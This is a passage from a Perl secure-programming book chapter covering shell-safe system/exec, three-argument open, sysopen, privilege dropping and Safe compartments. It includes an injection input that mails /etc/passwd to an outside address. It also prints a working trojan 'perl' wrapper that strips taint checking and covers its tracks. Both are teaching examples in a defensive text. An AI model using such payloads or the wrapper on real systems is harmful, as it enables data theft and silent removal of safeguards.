And, before I move on, I’ll write one more thing about this particular example. It’s not about Perl (or any other language); an application should never be able to do more than I intend it to do. I might have tricked my SELECT into also running a DELETE, but if my CGI script only needs to read data, it shouldn’t have the permissions to do anything to change the data, whether that means updating it, adding to it, or even deleting it. Likewise, any program that is supposed to only add data shouldn’t be able to read or update other records. Any server that I should use in these situations will have a way to define users or groups where you can minutely control the permissions. My program uses the appropriate credentials for the job I want it to do.
List Forms of system and exec
If I use either system or exec with a single argument, Perl looks in the argument for shell meta-characters. If it finds meta-characters, Perl passes the argument to the underlying shell for interpolation. Knowing this, I could construct a shell command that did something the program does not intend. Perhaps I have a system call that seems harmless, like the call to echo:
system( "/bin/echo $message" );
As a user of the program, I might try to craft the input so $message does more than provide an argument to echo. This string also terminates the command by using a semicolon, then starts a mail command that uses input redirection:
'Hello World!'; mail joe@example.com < /etc/passwd
Taint checking can catch this, but it’s still up to me to untaint it correctly. As I’ve shown, I can’t rely on taint checking alone to be safe. Instead, I can use system and exec in the list form. In that case, Perl uses the first argument as the program name and calls execvp directly, bypassing the shell and any interpolation or translation it might do:
system "/bin/echo", $message;
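To watch the list form at work, here is a minimal sketch. It assumes a Unix-like system and uses the running perl ($^X) as a stand-in for /bin/echo so it does not depend on where echo lives; the hostile message is an example value of my own. The child program receives the whole string as one argument, semicolon and all, and no second command runs:

```perl
#!/usr/bin/perl
use strict;
use warnings;

# A hostile value that would start a second command if a shell saw it.
my $message = q('Hello World!'; echo INJECTED);

# List form: each element goes to the program as-is, with no shell in
# between. $^X (the running perl) stands in for /bin/echo here.
my @command = ( $^X, '-e', 'print "got: $ARGV[0]\n"', $message );

# The indirect object form forces list processing even for short lists.
my $status = system { $command[0] } @command;
die "Could not run $command[0]: $!" if $status == -1;
```

The child prints the message exactly as I passed it, quotes and semicolon included, because nothing interpreted them along the way.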
Using an array with system does not automatically trigger its list processing mode. If the array has only one element, system only sees one argument. If system sees any shell metacharacters in that single scalar element, it passes the whole command to the shell, special characters and all:
@args = ( "/bin/echo $message" );
system @args; # single argument form still, might go to shell

@args = ( "/bin/echo", $message );
system @args; # list form, which is fine.
To get around this special case, I can use the indirect object notation with either of these functions. Perl uses the indirect object as the name of the program to call and interprets the arguments just as it would in list form, even if it only has one element. Although this example looks like it might include $args[0] twice, it really doesn’t. It’s a special indirect object notation that turns on the list processing mode and assumes that the first argument is the command name:
system { $args[0] } @args;
In this form, if @args is just the single argument ( "/bin/echo 'Hello'" ), system assumes that the name of the command is the whole string. Of course, it fails because there is no command /bin/echo 'Hello'. Somewhere in my program I need to go back and ensure those pieces show up as separate elements in @args.
To be even safer, I might want to keep a hash of allowed programs for system. If the program is not in the hash, I don’t execute the external command:
if( exists $Allowed_programs{ $args[0] } ) {
    system { $args[0] } @args;
}
else {
    warn qq|"$args[0]" is not an allowed program|;
}
Three Argument open
Since v5.6, the open built-in has a three (or more) argument form that separates the file mode from the filename. My previous opens were problems because the filename string also told open what to do with the file. If I could infect the filename, I could trick open into doing things the programmer didn’t intend. In the three argument form, whatever characters show up in $file are the characters in the filename, even if those characters are |, >, and so on:
#!/usr/bin/perl -T
my( $file ) = $ARGV[0] =~ m/([A-Z0-9_.-]+)/gi;
open my $fh, '>>', $file or die "Could not open for append: $file";
This doesn’t get around taint checking, but it is safer. You’ll find a more detailed discussion of this form of open in Chapter 8 of Intermediate Perl, as well as perlopentut.
sysopen
The sysopen function gives me even more control over file access. It has a three argument form that keeps the access mode separate from the filename and has the added benefit of exotic modes that I can configure minutely. For instance, the append mode in open creates the file if it doesn’t already exist. That’s two separate flags in sysopen: one for appending and one for creating:
#!/usr/bin/perl -T
use Fcntl qw(:DEFAULT);
my( $file ) = $ARGV[0] =~ m/([A-Z0-9_.-]+)/gi;
sysopen( my( $fh ), $file, O_WRONLY|O_APPEND|O_CREAT )
    or die "Could not open file: $!\n";
Since these are separate flags, I can use them apart from each other. If I don’t want to create new files, I leave off the O_CREAT. If the file doesn’t exist, Perl won’t create it, so no one can trick my program into making a file he might need for a different exploit:
#!/usr/bin/perl -T
use Fcntl qw(:DEFAULT);
my( $file ) = $ARGV[0] =~ m/([A-Z0-9_.-]+)/gi;
sysopen( my( $fh ), $file, O_WRONLY|O_APPEND )
    or die "Could not append to file: $!";
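Here is a sketch of how the separate flags behave, using a scratch directory from File::Temp so it leaves nothing behind. The file name app.log is hypothetical, and O_EXCL is a flag the text above does not mention: combined with O_CREAT, it makes sysopen fail if the file already exists, which covers the opposite case where I want to be sure I am the one creating the file:

```perl
use strict;
use warnings;
use Fcntl qw(:DEFAULT);
use File::Temp qw(tempdir);

my $dir  = tempdir( CLEANUP => 1 );
my $file = "$dir/app.log";    # hypothetical name; does not exist yet

# Without O_CREAT, appending to a missing file is an error.
my $appended = sysopen( my $fh, $file, O_WRONLY|O_APPEND );
print "append without O_CREAT: ", ( $appended ? "opened" : "failed: $!" ), "\n";

# O_CREAT|O_EXCL succeeds only if this call creates the file.
my $created = sysopen( my $new_fh, $file, O_WRONLY|O_CREAT|O_EXCL, 0600 );
print "create with O_EXCL: ", ( $created ? "created" : "failed: $!" ), "\n";
close $new_fh if $created;

# A second exclusive create fails because the file is there now.
my $again = sysopen( my $dup_fh, $file, O_WRONLY|O_CREAT|O_EXCL, 0600 );
print "second O_EXCL create: ", ( $again ? "created" : "failed: $!" ), "\n";
```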
Limit Special Privileges
Since Perl automatically turns on taint checking when I run the program as a different user than my real user, I should limit the scope of the special privileges. I might do this by forking a process to handle the part of the program that requires greater privileges, or give up the special privileges when I don’t need them anymore. I can set the real and effective users to the real user so I don’t have more privileges than I need. I can do this with the POSIX module:
use POSIX qw(setuid);
setuid( $< );
There are other ways to do this, but they depend on your particular operating system and are beyond the scope of this chapter (and even this book, really). This isn’t a problem specific to Perl, so you handle it the same way you would in any other language: compartmentalize or isolate the special access.
Safe Compartments
The Safe module provides me a way to limit what I allow to happen for a section of the code. It creates a new namespace in which that code is trapped, unable to look outside that namespace, and it limits the operations the code in that compartment can do.
I use Safe much like eval. I give the reval method a code string, which it compiles under its restrictions, and if everything’s okay, runs it. While running it, it may run into other violations which will stop its action:
# safe.pl
use v5.16;
use Safe 2.35;

say "Running $0 under $^V with Safe ", Safe->VERSION;

my $compartment = Safe->new;

my $code =<<'CODE';
use v5.10;
say "Hello Safe!";
CODE

$compartment->reval( $code ) or do {
    my $error = $@;
    warn "Safe compartment error! $error";
};
When I run this, I get an error:
% perl safe.pl
Running safe.pl under v5.18.0 with Safe 2.35
Safe compartment error! 'require' trapped by operation mask
The Safe “compartment” won’t run that code because I haven’t allowed it to carry out the require “opcode” that use needs. The compartment allows only a very limited set of default operations, so I have to tell it to allow the useful stuff. The Opcode module, which Safe relies on, lists the opcodes and the names of sets of opcodes I can use. So far, it trapped the require opcode, so I can permit that one:
my $compartment = Safe->new;
$compartment->permit( 'require' );
When I run it again, I get another error:
% perl safe.pl
Running safe.pl under v5.18.0 with Safe 2.35
Safe compartment error! 'say' trapped by operation mask
I can add that opcode to the ones I permit. This
is much like the Prussian stance that I mentioned earlier. I only allow
the things that I need:
my $compartment = Safe->new;
$compartment->permit( qw(require say) );
Now it all works:
% perl safe.pl
Running safe.pl under v5.18.0 with Safe 2.35
Hello Safe!
If I want to allow a set of opcodes instead of listing them individually, I can use the sets defined in Opcode, much like import tags in modules. For example, I can include all the input-output opcodes with :base_io:
$compartment->permit( qw(require :base_io) );
I can use the permit, permit_only, deny, and deny_only methods to create the set of allowable operations.
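As a small illustration of adjusting the mask, this sketch starts with a default compartment, shows that it already traps system, and then uses deny to take away multiplication. The expressions are examples of my own; the opcode name multiply comes from the Opcode module’s list:

```perl
use strict;
use warnings;
use Safe;

my $compartment = Safe->new;

# The default mask does not allow system, so this never runs a command.
my $ran = $compartment->reval( 'system "echo INJECTED"' );
my $system_error = $@;
print "system: trapped\n" if $system_error;

# Multiplication is allowed by default...
my $before = $compartment->reval( '6 * 7' );
print "before deny: ", ( defined $before ? $before : "error: $@" ), "\n";

# ...until I deny its opcode for this compartment.
$compartment->deny( 'multiply' );
my $after = $compartment->reval( '6 * 7' );
my $multiply_error = $@;
print "after deny: ", ( defined $after ? $after : "trapped" ), "\n";
```

The deny method adds to the current mask, while deny_only and permit_only replace it, so the order in which I call them matters.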
Inside the compartment, Safe uses its own namespace although it looks like the main:: package inside the reval. By default, only the *_ variables, $_ and @_, are visible. That way, the compartment can’t betray the environment or other information that might be sensitive. Here I try to use the $0 variable to output the program name:
# safe-no-share.pl
use v5.16;
use Safe 2.35;

my $compartment = Safe->new;
$compartment->permit( qw(require say) );

my $code =<<'CODE';
use v5.10;
say "Hello Safe, from $0!";
CODE

$compartment->reval( $code ) or do {
    my $error = $@;
    warn "Safe compartment error! $error";
};
I don’t see the program name in the output because Safe hides it:
% perl safe-no-share.pl
Hello Safe, from !
If I want to share a particular variable, I can use the share_from method to let the compartment see a variable from a particular package:
# safe-share.pl
use v5.16;
use Safe 2.35;

say "Running $0 under $^V with Safe ", Safe->VERSION;

my $compartment = Safe->new;
$compartment->permit( qw(require say) );
$compartment->share_from( 'main', [ qw( $0 ) ] );

my $code =<<'CODE';
use v5.10;
say "Hello Safe, from $0!";
CODE

$compartment->reval( $code ) or do {
    my $error = $@;
    warn "Safe compartment error! $error";
};
Now it works:
% perl safe-share.pl
Hello Safe, from safe-share.pl!
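The same method works for my own package variables. This sketch shares a variable named $greeting, which is a made-up name for illustration. It has to be a package variable (declared with our), since share_from works through the symbol table and cannot see lexical variables:

```perl
use strict;
use warnings;
use Safe;

# A package variable in main. A lexical (my) variable would not work.
our $greeting = 'Hello from main';

my $compartment = Safe->new;

# Before sharing, the compartment has its own, empty $greeting.
my $before = $compartment->reval( '$greeting' );

# After sharing, the compartment's $greeting is an alias to mine.
$compartment->share_from( 'main', [ '$greeting' ] );
my $after = $compartment->reval( '$greeting' );

print "before: ", ( defined $before ? $before : '(not visible)' ), "\n";
print "after:  ", ( defined $after  ? $after  : '(not visible)' ), "\n";
```

Because the shared variable is an alias, code in the compartment can also change it, so I only share what I am willing to have modified.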
There’s more about what you can allow, deny, share, or hide in the compartment, and the Safe module documentation tells you about it.
There is one more feature that I really like. A compartment will delete DESTROY and AUTOLOAD methods it finds in the class it uses. Although it looks like the compartment uses the main:: namespace, it’s really a special one which I can get with the root method:
# safe-root.pl
use v5.16;
use Safe 2.35;

{
my $compartment = Safe->new;
my $root = $compartment->root;
say "Safe namespace is $root";
}
When I run this, I don’t see it mention main:::
% perl safe-root.pl
Safe namespace is Safe::Root0
If I were trying to be clever, I could try to define methods in that namespace to trick it into running something. The DESTROY and AUTOLOAD methods typically aren’t called explicitly so they make good vectors for sneak attacks. I might try this, where outside the compartment I define a method in the namespace of the compartment:
# safe-root.pl
use v5.16;
use Safe 2.35;

{
my $compartment = Safe->new;
my $root = $compartment->root;
say "Safe namespace is $root";

no strict 'refs';
*{ $root . '::DESTROY' } = sub {
    my( $self, $arg ) = @_;
    $arg //= 'default';
    say "Calling DESTROY with $self $arg";
};

say "$root can DESTROY" if $root->can( 'DESTROY' );
$root->DESTROY( 'Explicit' );
}
When I run this, I see that I was able to define the DESTROY method and call it explicitly as a class method, but I don’t get any output when $compartment goes out of scope, which is when I might expect it to be called as an instance method:
% perl safe-root.pl
Safe namespace is Safe::Root0
Safe::Root0 can DESTROY
Calling DESTROY with Safe::Root0 Explicit
Compare this to the equivalent “unsafe” code where I create a do nothing class with the same methods:
# unsafe.pl
use v5.10;

package Unsafe {
    sub new { bless {}, $_[0] }
    sub root { __PACKAGE__ }
}

{
my $compartment = Unsafe->new;
my $root = $compartment->root;
say "Unsafe namespace is $root";

no strict 'refs';
*{ $root . '::DESTROY' } = sub {
    my( $self, $arg ) = @_;
    $arg //= 'default';
    say "Calling DESTROY with $self $arg";
};

say "$root can DESTROY" if $root->can( 'DESTROY' );
$root->DESTROY( 'Explicit' );
}
When I run that program, I see two calls to DESTROY, one of which is a class method call and one of which is an instance method call when the object goes out of scope:
% perl unsafe.pl
Unsafe namespace is Unsafe
Unsafe can DESTROY
Calling DESTROY with Unsafe Explicit
Calling DESTROY with Unsafe=HASH(0x7fdf59005468) default
So, when would I want to use this? In the rare case where I want to evaluate a bit of Perl that I get as a string, perhaps from configuration (although see Chapter 11 for why you should avoid that), serialization, or something else. For instance, I want to take a simple addition in the form of a string such as "2 + 2", and get the answer to the arithmetic. Instead of using a normal string eval, I can use Safe’s reval.
I’ll start with a simple REPL program where someone enters a line and I return the answer only when they are doing exactly what I need. I start by creating a Safe compartment where I deny everything:
# safe-repl.pl
use v5.16;
use Safe 2.35;

my $compartment = Safe->new;
$compartment->deny( qw(:default) );

LINE: while( <> ) {
    chomp;
    my $result = $compartment->reval( $_ ) or do {
        my $error = $@;
        warn "\tSafe compartment error for [$_]! $error";
        next LINE;
    };
    say "$_ = $result";
}
When I try to run this, the compartment catches everything because I’ve allowed nothing:
% perl safe-repl.pl
2 + 2
Safe compartment error for [2 + 2]! 'constant item' trapped
The problem is that Safe gives me a description of the operation it trapped, not the opcode name. That’s okay. I can see the complete map with a one-liner. It’s a long list that I extract here:
% perl -MOpcode=opdump -e opdump
const constant item
padany private value
rv2gv ref-to-glob cast
leaveeval eval "string" exit
If I want to find just the entries that include a particular string, I can give opdump an argument:
% perl -MOpcode=opdump -e 'opdump shift' item
const constant item
So, I modify my program to allow const:
my $compartment = Safe->new;
$compartment->deny( qw(:default) );
$compartment->permit( qw(const) );
When I try again, I get a different violation:
% perl safe-repl.pl
2 + 2
Safe compartment error for [2 + 2]! 'ref-to-glob cast' trapped
So, I find that opcode name:
% perl -MOpcode=opdump -e 'opdump shift' ref-to-glob
rv2gv ref-to-glob cast
I add that to the operations I permit:
my $compartment = Safe->new;
$compartment->deny( qw(:default) );
$compartment->permit( qw(const rv2gv) );
I try again, and again, until eventually I’ve sussed out all of the opcodes I need:
my $compartment = Safe->new;
$compartment->deny( qw(:default) );
$compartment->permit( qw(const rv2gv lineseq padany add leaveeval) );
If you’re one of the very few Perlers who know
the opcodes just by looking at the code, you probably don’t have to go
through this process. Now I have something that almost works:
% perl safe-repl.pl
2 + 2
2 + 2 = 4
I say “almost” because I’ve denied many opcodes
but I haven’t limited all the undesirable statements that someone can
make out of those. For instance, I can have a statement that has no
addition in it, or a syntax error:
% perl5.18.0 safe-repl.pl
2 + 2
2 + 2 = 4
2
2 = 2
2 3 4
Number found where operator expected
(Missing operator before 3?)
Number found where operator expected
(Missing operator before 4?)
Safe compartment error for [2 3 4]! syntax error
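One way to close that gap is to check the shape of the input before it ever reaches the compartment. This is only a sketch: evaluate_sum is a name I made up, the pattern accepts nothing but non-negative integers joined by plus signs, and the compartment uses the default mask rather than the stricter one above to keep the example short:

```perl
use strict;
use warnings;
use Safe;

my $compartment = Safe->new;    # default mask, for brevity

# evaluate_sum is a hypothetical helper. It returns the sum, or undef
# if the line is not strictly "integer + integer [+ integer ...]".
sub evaluate_sum {
    my( $line ) = @_;

    # At least one plus sign is required, so a bare "2" is rejected.
    return undef
        unless $line =~ m/\A \s* [0-9]+ (?: \s* \+ \s* [0-9]+ )+ \s* \z/x;

    my $result = $compartment->reval( $line );
    return undef if $@;
    return $result;
}

for my $line ( '2 + 2', '2', '2 3 4', 'system "ls"' ) {
    my $result = evaluate_sum( $line );
    print defined $result ? "$line = $result\n" : "Rejected [$line]\n";
}
```

Testing the result with defined instead of truth also means a sum of zero counts as an answer and not an error.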
Safe Limitations
The Safe module has other limitations. It’s not going to keep the code I allow from using up all the memory or CPU. If I allow operations such as chdir, the rest of the program may see those side effects, and so on. As with the other things I have shown in this chapter, Safe doesn’t prevent bad things from ever happening. It makes someone work a lot harder to exploit problems, but only if I program carefully and pay attention.
A Little Fun
Here’s a program that pretends to be the real perl, exploiting the same PATH insecurity the real perl catches. If I can trick you into thinking this program is perl, probably by putting it somewhere close to the front of your path, taint checking does you no good. It scrubs the argument list to remove -T, then scrubs the shebang line to do the same thing. It saves the new program, then runs it with a real perl which it gets from PATH (excluding itself, of course). Taint checking is a tool, not a cure. It tells me where I need to do some work. Have I said that enough yet?
#!/usr/bin/perl
# perl-untaint (rename as just 'perl')
use File::Basename;

# get rid of -T on command line
my @args = grep { ! /-T/ } @ARGV;

# determine program name. Usually that's the first thing
# after the switches (or the '--' which ends switches). This
# won't work if the last switch takes an argument, but handling
# that is just a matter of work.
my( $double ) = grep { $args[$_] eq '--' } 0 .. $#args;
my @single    = grep { $args[$_] =~ m/^-/ } 0 .. $#args;

my $program_index = do {
    if( $double )    { $double + 1 }
    elsif( @single ) { $single[-1] + 1 }
    else             { 0 }
};

my $program = splice @args, $program_index, 1, undef;

unless( -e $program ) {
    warn qq|Can't open perl program "$program": No such file or directory\n|;
    exit;
}

# save the program to another location (current dir probably works)
my $modified_program = basename( $program ) . ".evil";
splice @args, $program_index, 1, $modified_program;

open FILE, '<', $program;
open TMP, '>', $modified_program or exit; # quiet!
my $shebang = <FILE>;
$shebang =~ s/-T//;
print TMP $shebang, <FILE>;

# find out who I am (the first thing in the path) and take out that dir
# this is especially useful if . is in the path.
my $my_dir = dirname( `which perl` );
$ENV{PATH} = join ":", grep { $_ ne $my_dir and $_ ne '.' } split /:/, $ENV{PATH};

# find the real perl now that I've reset the path
chomp( my $Real_perl = `which perl` );

# run the program with the right perl but without taint checking
system("$Real_perl @args");

# clean up. We were never here.
unlink $modified_program;
So there it is. When you think you have it
figured out, someone is going to find another way. Even Samuel L.
Jackson as a sysadmin couldn’t hold off the dinosaurs.
Summary
Perl knows that injudiciously passing around
data can cause problems, and has features to give me, the programmer,
ways to handle that. Taint checking is a tool that helps me find parts
of the program that try to pass external data to resources outside of
the program. Perl intends for me to scrutinize these data and turn them
into something I can trust before I use them. Checking and scrubbing the
data isn’t the only answer, and I need to program defensively using the
other security features Perl offers. Even then, taint checking doesn’t
ensure I’m completely safe and I still need to carefully consider the
entire security environment just as I would with any other programming
language.
Further Reading
Start with the perlsec documentation, which gives an overview of secure programming techniques for Perl.
The perltaint documentation gives the full details on taint checking. The entries in perlfunc for system and exec talk about their security features.
The perlfunc documentation explains everything the open built-in can do, and there is even more in perlopentut.
Rafaël Garcia-Suarez shows off the Safe module for the Perl Advent Calendar at http://www.perladvent.org/2012/2012-12-07.html.
Although targeted toward web applications, the Open Web Application Security Project (OWASP, http://www.owasp.org/) has plenty of good advice for all types of applications.
The Software Engineering Institute has a CERT Perl Secure Coding Standard at https://www.securecoding.cert.org/confluence/display/perl/CERT+Perl+Secure+Coding+Standard.
Even if you don’t want to read warnings from the Computer Emergency Response Team (CERT, http://www.cert.org) or SecurityFocus (http://www.securityfocus.com/), reading some of their advisories about perl interpreters or programs is often instructive.
The Source Code Analysis Laboratory (SCALe, http://www.cert.org/secure-coding/scale/) can validate Perl code. They’ll even issue a certificate of conformance.
The documentation for DBI has more information about placeholders and bind parameters, as well as TaintIn and TaintOut. Programming the Perl DBI by Tim Bunce and Alligator Descartes is another good source, although it does not cover the newer taint features of DBI.
Andy Lester collates several resources about SQL Injection at http://bobby-tables.com/, which takes its name from an xkcd cartoon (http://xkcd.com/327/) about a student whose name uses SQL injection to delete his school’s database.
Mark Jason Dominus covers the “stupidity” of using a variable name from a variable at http://perl.plover.com/varvarname.html.
Mark Jason Dominus talks about the “Prussian” and “American” stances in his talk at http://perl.plover.com/yak/security/.
There are many resources that discuss SQL
injection attacks, and you shouldn’t limit yourself to reading just the
ones that use Perl as an example.
ref : http://chimera.labs.oreilly.com/books/1234000001527/ch03.html#vicunas-03-9